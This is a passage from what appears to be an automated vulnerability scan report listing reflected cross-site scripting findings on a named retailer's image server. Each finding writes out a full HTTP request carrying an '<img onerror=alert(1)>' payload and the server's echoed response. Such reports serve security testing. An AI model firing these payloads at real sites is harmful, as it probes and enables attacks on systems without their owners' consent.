Host: images3.pacsun.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://shop.pacsun.com/home.jsp
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: stop_mobi=yes; PAC1=0; s_cc=true; s_cm=1; c_m=undefinedwww.mcafeesecure.comwww.mcafeesecure.com; gpv_page=Homepage; s_sq=%5B%5BB%5D%5D; s_vi=[CS]v1|2742D80B850110C3-4000010800279540[CE]; mbox=check#true#1317384269|session#1317384208243-106173#1317386069|PC#1317384208243-106173.19#1318593819; fsr.a=1317384219407

Response

HTTP/1.1 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 81
Cache-Control: max-age=3600
Date: Fri, 30 Sep 2011 12:05:45 GMT
Connection: close

Unable to find /pacsun/detailLogo_E0194385<img src=a onerror=alert(1)>e4589bd16b0

3.84. http://images3.pacsun.com/is/image/pacsun/detailLogo_E02 [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://images3.pacsun.com
Path:   /is/image/pacsun/detailLogo_E02

Issue detail

The value of REST URL parameter 4 is copied into the response body without HTML encoding. The payload 56cd3<img%20src%3da%20onerror%3dalert(1)>61afdd70dae was submitted in the REST URL parameter 4 and was echoed, URL-decoded, as 56cd3<img src=a onerror=alert(1)>61afdd70dae in the application's response.

The proof of concept places an <img> element with an onerror event handler, and so arbitrary JavaScript, into the response body. The response is served with Content-Type: text/plain rather than text/html and without an X-Content-Type-Options header, so the handler is reflected verbatim but only executes in a client that renders this body as HTML; confirm in a browser before rating the finding as exploitable.

Request

GET /is/image/pacsun/detailLogo_E0256cd3<img%20src%3da%20onerror%3dalert(1)>61afdd70dae?$img_gif$&hei=20&wid=65&op_saturation=-100&op_colorize=60,60,60,off,100 HTTP/1.1
Host: images3.pacsun.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://shop.pacsun.com/home.jsp
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: stop_mobi=yes; PAC1=0; s_cc=true; s_cm=1; c_m=undefinedwww.mcafeesecure.comwww.mcafeesecure.com; gpv_page=Homepage; s_sq=%5B%5BB%5D%5D; s_vi=[CS]v1|2742D80B850110C3-4000010800279540[CE]; mbox=check#true#1317384269|session#1317384208243-106173#1317386069|PC#1317384208243-106173.19#1318593819; fsr.a=1317384219407

Response

HTTP/1.1 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 81
Cache-Control: max-age=3600
Date: Fri, 30 Sep 2011 12:05:38 GMT
Connection: close

Unable to find /pacsun/detailLogo_E0256cd3<img src=a onerror=alert(1)>61afdd70dae

3.85. http://images3.pacsun.com/is/image/pacsun/detailLogo_ElectricBar2 [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://images3.pacsun.com
Path:   /is/image/pacsun/detailLogo_ElectricBar2

Issue detail

The value of REST URL parameter 4 is copied into the response body without HTML encoding. The payload 24426<img%20src%3da%20onerror%3dalert(1)>eb76c2b7d07 was submitted in the REST URL parameter 4 and was echoed, URL-decoded, as 24426<img src=a onerror=alert(1)>eb76c2b7d07 in the application's response.

The proof of concept places an <img> element with an onerror event handler, and so arbitrary JavaScript, into the response body. The response is served with Content-Type: text/plain rather than text/html and without an X-Content-Type-Options header, so the handler is reflected verbatim but only executes in a client that renders this body as HTML; confirm in a browser before rating the finding as exploitable.

Request

GET /is/image/pacsun/detailLogo_ElectricBar224426<img%20src%3da%20onerror%3dalert(1)>eb76c2b7d07?$img_gif$&hei=20&wid=111&op_saturation=-100&op_colorize=60,60,60,off,100 HTTP/1.1
Host: images3.pacsun.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://shop.pacsun.com/home.jsp
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: stop_mobi=yes; PAC1=0; s_cc=true; s_cm=1; c_m=undefinedwww.mcafeesecure.comwww.mcafeesecure.com; gpv_page=Homepage; s_sq=%5B%5BB%5D%5D; s_vi=[CS]v1|2742D80B850110C3-4000010800279540[CE]; mbox=check#true#1317384269|session#1317384208243-106173#1317386069|PC#1317384208243-106173.19#1318593819; fsr.a=1317384219407

Response

HTTP/1.1 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 90
Cache-Control: max-age=3600
Date: Fri, 30 Sep 2011 12:05:24 GMT
Connection: close

Unable to find /pacsun/detailLogo_ElectricBar224426<img src=a onerror=alert(1)>eb76c2b7d07

3.86. http://images3.pacsun.com/is/image/pacsun/detailLogo_F01 [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://images3.pacsun.com
Path:   /is/image/pacsun/detailLogo_F01

Issue detail

The value of REST URL parameter 4 is copied into the response body without HTML encoding. The payload fcae1<img%20src%3da%20onerror%3dalert(1)>20c237af538 was submitted in the REST URL parameter 4 and was echoed, URL-decoded, as fcae1<img src=a onerror=alert(1)>20c237af538 in the application's response.

The proof of concept places an <img> element with an onerror event handler, and so arbitrary JavaScript, into the response body. The response is served with Content-Type: text/plain rather than text/html and without an X-Content-Type-Options header, so the handler is reflected verbatim but only executes in a client that renders this body as HTML; confirm in a browser before rating the finding as exploitable.

Request

GET /is/image/pacsun/detailLogo_F01fcae1<img%20src%3da%20onerror%3dalert(1)>20c237af538?$img_gif$&hei=20&wid=120&op_saturation=-100&op_colorize=60,60,60,off,100 HTTP/1.1
Host: images3.pacsun.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://shop.pacsun.com/home.jsp
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: stop_mobi=yes; PAC1=0; s_cc=true; s_cm=1; c_m=undefinedwww.mcafeesecure.comwww.mcafeesecure.com; gpv_page=Homepage; s_sq=%5B%5BB%5D%5D; s_vi=[CS]v1|2742D80B850110C3-4000010800279540[CE]; mbox=check#true#1317384269|session#1317384208243-106173#1317386069|PC#1317384208243-106173.19#1318593819; fsr.a=1317384219407

Response

HTTP/1.1 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 81
Cache-Control: max-age=3600
Date: Fri, 30 Sep 2011 12:05:43 GMT
Connection: close

Unable to find /pacsun/detailLogo_F01fcae1<img src=a onerror=alert(1)>20c237af538

3.87. http://images3.pacsun.com/is/image/pacsun/detailLogo_I03 [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://images3.pacsun.com
Path:   /is/image/pacsun/detailLogo_I03

Issue detail

The value of REST URL parameter 4 is copied into the response body without HTML encoding. The payload be7d9<img%20src%3da%20onerror%3dalert(1)>5e6ae0f073c was submitted in the REST URL parameter 4 and was echoed, URL-decoded, as be7d9<img src=a onerror=alert(1)>5e6ae0f073c in the application's response.

The proof of concept places an <img> element with an onerror event handler, and so arbitrary JavaScript, into the response body. The response is served with Content-Type: text/plain rather than text/html and without an X-Content-Type-Options header, so the handler is reflected verbatim but only executes in a client that renders this body as HTML; confirm in a browser before rating the finding as exploitable.

Request

GET /is/image/pacsun/detailLogo_I03be7d9<img%20src%3da%20onerror%3dalert(1)>5e6ae0f073c?$img_gif$&hei=20&wid=18&op_saturation=-100&op_colorize=60,60,60,off,100 HTTP/1.1
Host: images3.pacsun.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://shop.pacsun.com/home.jsp
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: stop_mobi=yes; PAC1=0; s_cc=true; s_cm=1; c_m=undefinedwww.mcafeesecure.comwww.mcafeesecure.com; gpv_page=Homepage; s_sq=%5B%5BB%5D%5D; s_vi=[CS]v1|2742D80B850110C3-4000010800279540[CE]; mbox=check#true#1317384269|session#1317384208243-106173#1317386069|PC#1317384208243-106173.19#1318593819; fsr.a=1317384219407

Response

HTTP/1.1 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 81
Cache-Control: max-age=3600
Date: Fri, 30 Sep 2011 12:05:30 GMT
Connection: close

Unable to find /pacsun/detailLogo_I03be7d9<img src=a onerror=alert(1)>5e6ae0f073c

3.88. http://images3.pacsun.com/is/image/pacsun/detailLogo_J02 [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://images3.pacsun.com
Path:   /is/image/pacsun/detailLogo_J02

Issue detail

The value of REST URL parameter 4 is copied into the response body without HTML encoding. The payload 7d09f<img%20src%3da%20onerror%3dalert(1)>4bc9fdbe473 was submitted in the REST URL parameter 4 and was echoed, URL-decoded, as 7d09f<img src=a onerror=alert(1)>4bc9fdbe473 in the application's response.

The proof of concept places an <img> element with an onerror event handler, and so arbitrary JavaScript, into the response body. The response is served with Content-Type: text/plain rather than text/html and without an X-Content-Type-Options header, so the handler is reflected verbatim but only executes in a client that renders this body as HTML; confirm in a browser before rating the finding as exploitable.

Request

GET /is/image/pacsun/detailLogo_J027d09f<img%20src%3da%20onerror%3dalert(1)>4bc9fdbe473?$img_gif$&hei=20&wid=40&op_saturation=-100&op_colorize=60,60,60,off,100 HTTP/1.1
Host: images3.pacsun.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://shop.pacsun.com/home.jsp
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: stop_mobi=yes; PAC1=0; s_cc=true; s_cm=1; c_m=undefinedwww.mcafeesecure.comwww.mcafeesecure.com; gpv_page=Homepage; s_sq=%5B%5BB%5D%5D; s_vi=[CS]v1|2742D80B850110C3-4000010800279540[CE]; mbox=check#true#1317384269|session#1317384208243-106173#1317386069|PC#1317384208243-106173.19#1318593819; fsr.a=1317384219407

Response

HTTP/1.1 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 81
Cache-Control: max-age=3600
Date: Fri, 30 Sep 2011 12:05:31 GMT
Connection: close

Unable to find /pacsun/detailLogo_J027d09f<img src=a onerror=alert(1)>4bc9fdbe473

3.89. http://images3.pacsun.com/is/image/pacsun/detailLogo_L01 [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://images3.pacsun.com
Path:   /is/image/pacsun/detailLogo_L01

Issue detail

The value of REST URL parameter 4 is copied into the response body without HTML encoding. The payload 679b6<img%20src%3da%20onerror%3dalert(1)>45652ca7449 was submitted in the REST URL parameter 4 and was echoed, URL-decoded, as 679b6<img src=a onerror=alert(1)>45652ca7449 in the application's response.

The proof of concept places an <img> element with an onerror event handler, and so arbitrary JavaScript, into the response body. The response is served with Content-Type: text/plain rather than text/html and without an X-Content-Type-Options header, so the handler is reflected verbatim but only executes in a client that renders this body as HTML; confirm in a browser before rating the finding as exploitable.

Request

GET /is/image/pacsun/detailLogo_L01679b6<img%20src%3da%20onerror%3dalert(1)>45652ca7449?$img_gif$&hei=20&wid=57&op_saturation=-100&op_colorize=60,60,60,off,100 HTTP/1.1
Host: images3.pacsun.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://shop.pacsun.com/home.jsp
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: stop_mobi=yes; PAC1=0; s_cc=true; s_cm=1; c_m=undefinedwww.mcafeesecure.comwww.mcafeesecure.com; gpv_page=Homepage; s_sq=%5B%5BB%5D%5D; s_vi=[CS]v1|2742D80B850110C3-4000010800279540[CE]; mbox=check#true#1317384269|session#1317384208243-106173#1317386069|PC#1317384208243-106173.19#1318593819; fsr.a=1317384219407

Response

HTTP/1.1 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 81
Cache-Control: max-age=3600
Date: Fri, 30 Sep 2011 12:05:38 GMT
Connection: close

Unable to find /pacsun/detailLogo_L01679b6<img src=a onerror=alert(1)>45652ca7449

3.90. http://images3.pacsun.com/is/image/pacsun/detailLogo_L03 [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://images3.pacsun.com
Path:   /is/image/pacsun/detailLogo_L03

Issue detail

The value of REST URL parameter 4 is copied into the response body without HTML encoding. The payload cb519<img%20src%3da%20onerror%3dalert(1)>1304a011ff5 was submitted in the REST URL parameter 4 and was echoed, URL-decoded, as cb519<img src=a onerror=alert(1)>1304a011ff5 in the application's response.

The proof of concept places an <img> element with an onerror event handler, and so arbitrary JavaScript, into the response body. The response is served with Content-Type: text/plain rather than text/html and without an X-Content-Type-Options header, so the handler is reflected verbatim but only executes in a client that renders this body as HTML; confirm in a browser before rating the finding as exploitable.

Request

GET /is/image/pacsun/detailLogo_L03cb519<img%20src%3da%20onerror%3dalert(1)>1304a011ff5?$img_gif$&hei=20&wid=88&op_saturation=-100&op_colorize=60,60,60,off,100 HTTP/1.1
Host: images3.pacsun.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://shop.pacsun.com/home.jsp
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: stop_mobi=yes; PAC1=0; s_cc=true; s_cm=1; c_m=undefinedwww.mcafeesecure.comwww.mcafeesecure.com; gpv_page=Homepage; s_sq=%5B%5BB%5D%5D; s_vi=[CS]v1|2742D80B850110C3-4000010800279540[CE]; mbox=check#true#1317384269|session#1317384208243-106173#1317386069|PC#1317384208243-106173.19#1318593819; fsr.a=1317384219407

Response

HTTP/1.1 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 81
Cache-Control: max-age=3600
Date: Fri, 30 Sep 2011 12:05:40 GMT
Connection: close

Unable to find /pacsun/detailLogo_L03cb519<img src=a onerror=alert(1)>1304a011ff5

3.91. http://images3.pacsun.com/is/image/pacsun/detailLogo_L04 [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://images3.pacsun.com
Path:   /is/image/pacsun/detailLogo_L04

Issue detail

The value of REST URL parameter 4 is copied into the response body without HTML encoding. The payload 557cd<img%20src%3da%20onerror%3dalert(1)>74814746684 was submitted in the REST URL parameter 4 and was echoed, URL-decoded, as 557cd<img src=a onerror=alert(1)>74814746684 in the application's response.

The proof of concept places an <img> element with an onerror event handler, and so arbitrary JavaScript, into the response body. The response is served with Content-Type: text/plain rather than text/html and without an X-Content-Type-Options header, so the handler is reflected verbatim but only executes in a client that renders this body as HTML; confirm in a browser before rating the finding as exploitable.

Request

GET /is/image/pacsun/detailLogo_L04557cd<img%20src%3da%20onerror%3dalert(1)>74814746684?$img_gif$&hei=20&wid=124&op_saturation=-100&op_colorize=60,60,60,off,100 HTTP/1.1
Host: images3.pacsun.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://shop.pacsun.com/home.jsp
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: stop_mobi=yes; PAC1=0; s_cc=true; s_cm=1; c_m=undefinedwww.mcafeesecure.comwww.mcafeesecure.com; gpv_page=Homepage; s_sq=%5B%5BB%5D%5D; s_vi=[CS]v1|2742D80B850110C3-4000010800279540[CE]; mbox=check#true#1317384269|session#1317384208243-106173#1317386069|PC#1317384208243-106173.19#1318593819; fsr.a=1317384219407

Response

HTTP/1.1 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 81
Cache-Control: max-age=3600
Date: Fri, 30 Sep 2011 12:05:38 GMT
Connection: close

Unable to find /pacsun/detailLogo_L04557cd<img src=a onerror=alert(1)>74814746684

3.92. http://images3.pacsun.com/is/image/pacsun/detailLogo_M01 [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://images3.pacsun.com
Path:   /is/image/pacsun/detailLogo_M01

Issue detail

The value of REST URL parameter 4 is copied into the response body without HTML encoding. The payload 97b00<img%20src%3da%20onerror%3dalert(1)>76e1c38304b was submitted in the REST URL parameter 4 and was echoed, URL-decoded, as 97b00<img src=a onerror=alert(1)>76e1c38304b in the application's response.

The proof of concept places an <img> element with an onerror event handler, and so arbitrary JavaScript, into the response body. The response is served with Content-Type: text/plain rather than text/html and without an X-Content-Type-Options header, so the handler is reflected verbatim but only executes in a client that renders this body as HTML; confirm in a browser before rating the finding as exploitable.

Request

GET /is/image/pacsun/detailLogo_M0197b00<img%20src%3da%20onerror%3dalert(1)>76e1c38304b?$img_gif$&hei=20&wid=30&op_saturation=-100&op_colorize=60,60,60,off,100 HTTP/1.1
Host: images3.pacsun.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://shop.pacsun.com/home.jsp
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: stop_mobi=yes; PAC1=0; s_cc=true; s_cm=1; c_m=undefinedwww.mcafeesecure.comwww.mcafeesecure.com; gpv_page=Homepage; s_sq=%5B%5BB%5D%5D; s_vi=[CS]v1|2742D80B850110C3-4000010800279540[CE]; mbox=check#true#1317384269|session#1317384208243-106173#1317386069|PC#1317384208243-106173.19#1318593819; fsr.a=1317384219407

Response

HTTP/1.1 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 81
Cache-Control: max-age=3600
Date: Fri, 30 Sep 2011 12:05:42 GMT
Connection: close

Unable to find /pacsun/detailLogo_M0197b00<img src=a onerror=alert(1)>76e1c38304b

3.93. http://images3.pacsun.com/is/image/pacsun/detailLogo_M03 [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://images3.pacsun.com
Path:   /is/image/pacsun/detailLogo_M03

Issue detail

The value of REST URL parameter 4 is copied into the response body without HTML encoding. The payload 8a39a<img%20src%3da%20onerror%3dalert(1)>4a9a17b5739 was submitted in the REST URL parameter 4 and was echoed, URL-decoded, as 8a39a<img src=a onerror=alert(1)>4a9a17b5739 in the application's response.

The proof of concept places an <img> element with an onerror event handler, and so arbitrary JavaScript, into the response body. The response is served with Content-Type: text/plain rather than text/html and without an X-Content-Type-Options header, so the handler is reflected verbatim but only executes in a client that renders this body as HTML; confirm in a browser before rating the finding as exploitable.

Request

GET /is/image/pacsun/detailLogo_M038a39a<img%20src%3da%20onerror%3dalert(1)>4a9a17b5739?$img_gif$&hei=20&wid=28&op_saturation=-100&op_colorize=60,60,60,off,100 HTTP/1.1
Host: images3.pacsun.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://shop.pacsun.com/home.jsp
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: stop_mobi=yes; PAC1=0; s_cc=true; s_cm=1; c_m=undefinedwww.mcafeesecure.comwww.mcafeesecure.com; gpv_page=Homepage; s_sq=%5B%5BB%5D%5D; s_vi=[CS]v1|2742D80B850110C3-4000010800279540[CE]; mbox=check#true#1317384269|session#1317384208243-106173#1317386069|PC#1317384208243-106173.19#1318593819; fsr.a=1317384219407

Response

HTTP/1.1 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 81
Cache-Control: max-age=3600
Date: Fri, 30 Sep 2011 12:05:29 GMT
Connection: close

Unable to find /pacsun/detailLogo_M038a39a<img src=a onerror=alert(1)>4a9a17b5739

3.94. http://images3.pacsun.com/is/image/pacsun/detailLogo_M04 [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://images3.pacsun.com
Path:   /is/image/pacsun/detailLogo_M04

Issue detail

The value of REST URL parameter 4 is copied into the response body without HTML encoding. The payload 51ab9<img%20src%3da%20onerror%3dalert(1)>07b684bf62e was submitted in the REST URL parameter 4 and was echoed, URL-decoded, as 51ab9<img src=a onerror=alert(1)>07b684bf62e in the application's response.

The proof of concept places an <img> element with an onerror event handler, and so arbitrary JavaScript, into the response body. The response is served with Content-Type: text/plain rather than text/html and without an X-Content-Type-Options header, so the handler is reflected verbatim but only executes in a client that renders this body as HTML; confirm in a browser before rating the finding as exploitable.

Request

GET /is/image/pacsun/detailLogo_M0451ab9<img%20src%3da%20onerror%3dalert(1)>07b684bf62e?$img_gif$&hei=20&wid=53&op_saturation=-100&op_colorize=60,60,60,off,100 HTTP/1.1
Host: images3.pacsun.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://shop.pacsun.com/home.jsp
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: stop_mobi=yes; PAC1=0; s_cc=true; s_cm=1; c_m=undefinedwww.mcafeesecure.comwww.mcafeesecure.com; gpv_page=Homepage; s_sq=%5B%5BB%5D%5D; s_vi=[CS]v1|2742D80B850110C3-4000010800279540[CE]; mbox=check#true#1317384269|session#1317384208243-106173#1317386069|PC#1317384208243-106173.19#1318593819; fsr.a=1317384219407

Response

HTTP/1.1 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 81
Cache-Control: max-age=3600
Date: Fri, 30 Sep 2011 12:05:38 GMT
Connection: close

Unable to find /pacsun/detailLogo_M0451ab9<img src=a onerror=alert(1)>07b684bf62e

3.95. http://images3.pacsun.com/is/image/pacsun/detailLogo_M05 [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://images3.pacsun.com
Path:   /is/image/pacsun/detailLogo_M05

Issue detail

The value of REST URL parameter 4 is copied into the response body without HTML encoding. The payload 87f41<img%20src%3da%20onerror%3dalert(1)>344f1a56de0 was submitted in the REST URL parameter 4 and was echoed, URL-decoded, as 87f41<img src=a onerror=alert(1)>344f1a56de0 in the application's response.

The proof of concept places an <img> element with an onerror event handler, and so arbitrary JavaScript, into the response body. The response is served with Content-Type: text/plain rather than text/html and without an X-Content-Type-Options header, so the handler is reflected verbatim but only executes in a client that renders this body as HTML; confirm in a browser before rating the finding as exploitable.

Request

GET /is/image/pacsun/detailLogo_M0587f41<img%20src%3da%20onerror%3dalert(1)>344f1a56de0?$img_gif$&hei=20&wid=134&op_saturation=-100&op_colorize=60,60,60,off,100 HTTP/1.1
Host: images3.pacsun.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://shop.pacsun.com/home.jsp
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: stop_mobi=yes; PAC1=0; s_cc=true; s_cm=1; c_m=undefinedwww.mcafeesecure.comwww.mcafeesecure.com; gpv_page=Homepage; s_sq=%5B%5BB%5D%5D; s_vi=[CS]v1|2742D80B850110C3-4000010800279540[CE]; mbox=check#true#1317384269|session#1317384208243-106173#1317386069|PC#1317384208243-106173.19#1318593819; fsr.a=1317384219407

Response

HTTP/1.1 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 81
Cache-Control: max-age=3600
Date: Fri, 30 Sep 2011 12:05:33 GMT
Connection: close

Unable to find /pacsun/detailLogo_M0587f41<img src=a onerror=alert(1)>344f1a56de0

3.96. http://images3.pacsun.com/is/image/pacsun/detailLogo_M06 [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://images3.pacsun.com
Path:   /is/image/pacsun/detailLogo_M06

Issue detail

The value of REST URL parameter 4 is copied into the response body without HTML encoding. The payload b73a8<img%20src%3da%20onerror%3dalert(1)>a869a660e67 was submitted in the REST URL parameter 4 and was echoed, URL-decoded, as b73a8<img src=a onerror=alert(1)>a869a660e67 in the application's response.

The proof of concept places an <img> element with an onerror event handler, and so arbitrary JavaScript, into the response body. The response is served with Content-Type: text/plain rather than text/html and without an X-Content-Type-Options header, so the handler is reflected verbatim but only executes in a client that renders this body as HTML; confirm in a browser before rating the finding as exploitable.

Request

GET /is/image/pacsun/detailLogo_M06b73a8<img%20src%3da%20onerror%3dalert(1)>a869a660e67?$img_gif$&hei=20&wid=104&op_saturation=-100&op_colorize=60,60,60,off,100 HTTP/1.1
Host: images3.pacsun.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://shop.pacsun.com/home.jsp
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: stop_mobi=yes; PAC1=0; s_cc=true; s_cm=1; c_m=undefinedwww.mcafeesecure.comwww.mcafeesecure.com; gpv_page=Homepage; s_sq=%5B%5BB%5D%5D; s_vi=[CS]v1|2742D80B850110C3-4000010800279540[CE]; mbox=check#true#1317384269|session#1317384208243-106173#1317386069|PC#1317384208243-106173.19#1318593819; fsr.a=1317384219407

Response

HTTP/1.1 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 81
Cache-Control: max-age=3600
Date: Fri, 30 Sep 2011 12:05:46 GMT
Connection: close

Unable to find /pacsun/detailLogo_M06b73a8<img src=a onerror=alert(1)>a869a660e67

3.97. http://images3.pacsun.com/is/image/pacsun/detailLogo_O01 [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://images3.pacsun.com
Path:   /is/image/pacsun/detailLogo_O01

Issue detail

The value of REST URL parameter 4 is copied into the response body without HTML encoding. The payload 16c8f<img%20src%3da%20onerror%3dalert(1)>ebbc796eaf3 was submitted in the REST URL parameter 4 and was echoed, URL-decoded, as 16c8f<img src=a onerror=alert(1)>ebbc796eaf3 in the application's response.

The proof of concept places an <img> element with an onerror event handler, and so arbitrary JavaScript, into the response body. The response is served with Content-Type: text/plain rather than text/html and without an X-Content-Type-Options header, so the handler is reflected verbatim but only executes in a client that renders this body as HTML; confirm in a browser before rating the finding as exploitable.

Request

GET /is/image/pacsun/detailLogo_O0116c8f<img%20src%3da%20onerror%3dalert(1)>ebbc796eaf3?$img_gif$&hei=20&wid=55&op_saturation=-100&op_colorize=60,60,60,off,100 HTTP/1.1
Host: images3.pacsun.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://shop.pacsun.com/home.jsp
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: stop_mobi=yes; PAC1=0; s_cc=true; s_cm=1; c_m=undefinedwww.mcafeesecure.comwww.mcafeesecure.com; gpv_page=Homepage; s_sq=%5B%5BB%5D%5D; s_vi=[CS]v1|2742D80B850110C3-4000010800279540[CE]; mbox=check#true#1317384269|session#1317384208243-106173#1317386069|PC#1317384208243-106173.19#1318593819; fsr.a=1317384219407

Response

HTTP/1.1 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 81
Cache-Control: max-age=3600
Date: Fri, 30 Sep 2011 12:05:34 GMT
Connection: close

